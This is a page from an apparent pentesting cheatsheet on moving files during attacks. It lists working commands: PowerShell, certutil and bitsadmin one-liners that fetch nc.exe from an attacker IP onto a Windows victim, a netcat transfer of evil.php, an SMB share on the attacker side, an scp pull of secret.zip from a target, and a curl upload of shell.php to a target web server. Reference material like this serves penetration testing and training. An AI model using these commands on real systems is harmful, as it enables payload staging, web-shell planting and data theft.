Red/Blue Cheatsheet | NORI ZAMURAI
  • Introduction
  • Pentesting Cheatsheets
    • Reconnaissance
      • Other method
      • Nmap
    • Enumeration
      • DNS (53)
      • SSH (22)
      • FTP (21)
      • SMTP (25)
      • WEB (80,443)
      • POP3 (110)
      • SMB (139,445)
      • MySQL (3306)
    • Privilege Escalation
      • Linux
      • Windows
    • Shell
      • Reverse Shell
      • Upgrade Shell
      • Meterpreter
    • Password Crack
      • Hash Analysis
      • Bruteforce
    • Exploit
      • Search Exploit
      • Attacks
    • Paylaod
      • Msfvenom
    • File Transfer
    • Port Forwarding
    • Service Login and Interaction
  • Useful Commands
    • Linux Commands
    • Powershell
    • CMD
    • Python
    • Editor: Vi & Tmux
    • Metasploit
    • Powershell Empire
Powered by GitBook
On this page
  • Download
  • HTTP Server with Python
  • Curl
  • Powershell
  • Cetutil
  • Bitsadmin
  • Netcat
  • SMB
  • SCP
  • Upload
  • Curl
  • Link

Was this helpful?

  1. Pentesting Cheatsheets

File Transfer

Download

HTTP Server with Python

python3 -m http.server 80
python2 -m SimpleHTTPServer 80

Curl

curl -O http://host/file

Powershell

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')

powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")

powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"

Cetutil

certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe

Bitsadmin

bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe

Netcat

Attacker:
  nc -lvnp 443 < evil.php

Victim:
  nc -v 192.168.42.42 443 > evil.php

SMB

Attacker:
    python smbserver.py share .
Victom:
    copy \\10.10.14.21\share\whoami.exe .

SCP

Attacker:
    scp charix@10.10.10.84:secret.zip ./

scp -r user@targetIP:/path/to/share /local/share
# remote to local

Upload

Curl

curl --upload-file shell.php --url http://$ip/shell.php --http1.0

scp /path/to/local/file.txt user@targetIP:/path/to/share
# local to remote

Link

PreviousMsfvenomNextPort Forwarding

Last updated 5 years ago

Was this helpful?

Post Exploitation File Transfers on Windows the Manual Way
Logo